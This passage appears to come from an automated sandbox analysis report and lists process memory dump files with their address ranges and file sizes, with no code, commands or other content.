                    • memory/4928-106-0x0000000000000000-mapping.dmp

                    • memory/4940-348-0x0000000000000000-mapping.dmp

                    • memory/4976-294-0x0000000000000000-mapping.dmp

                    • memory/5012-280-0x0000000000A80000-0x0000000000A81000-memory.dmp

                      Filesize

                      4KB

                    • memory/5012-276-0x0000000000000000-mapping.dmp

                    • memory/5012-279-0x0000000071FB0000-0x000000007269E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/5012-282-0x0000000002AE0000-0x0000000002AE1000-memory.dmp

                      Filesize

                      4KB

                    • memory/5012-293-0x000000000AA50000-0x000000000AA51000-memory.dmp

                      Filesize

                      4KB

                    • memory/5044-118-0x0000000000000000-mapping.dmp

                    • memory/5056-119-0x0000000000000000-mapping.dmp

                    • memory/5076-226-0x00000000000A0000-0x00000000000A1000-memory.dmp

                      Filesize

                      4KB

                    • memory/5076-228-0x00000000008A0000-0x00000000008A1000-memory.dmp

                      Filesize

                      4KB

                    • memory/5076-224-0x00000000710A0000-0x000000007178E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/5076-231-0x0000000004D80000-0x0000000004DD1000-memory.dmp

                      Filesize

                      324KB

                    • memory/5076-222-0x0000000000000000-mapping.dmp

                    • memory/5088-327-0x0000000000000000-mapping.dmp

                    • memory/5088-329-0x0000000071FB0000-0x000000007269E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/5088-344-0x0000000007E80000-0x0000000007E81000-memory.dmp

                      Filesize

                      4KB

                    • memory/5088-336-0x00000000076F0000-0x00000000076F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/5088-354-0x0000000008E10000-0x0000000008E43000-memory.dmp

                      Filesize

                      204KB

                    • memory/5088-361-0x0000000008DD0000-0x0000000008DD1000-memory.dmp

                      Filesize

                      4KB

                    • memory/5088-362-0x0000000008F40000-0x0000000008F41000-memory.dmp

                      Filesize

                      4KB

                    • memory/5096-323-0x00000000045D0000-0x00000000045D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/5096-319-0x00000000045D0000-0x00000000045D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/5096-314-0x0000000000000000-mapping.dmp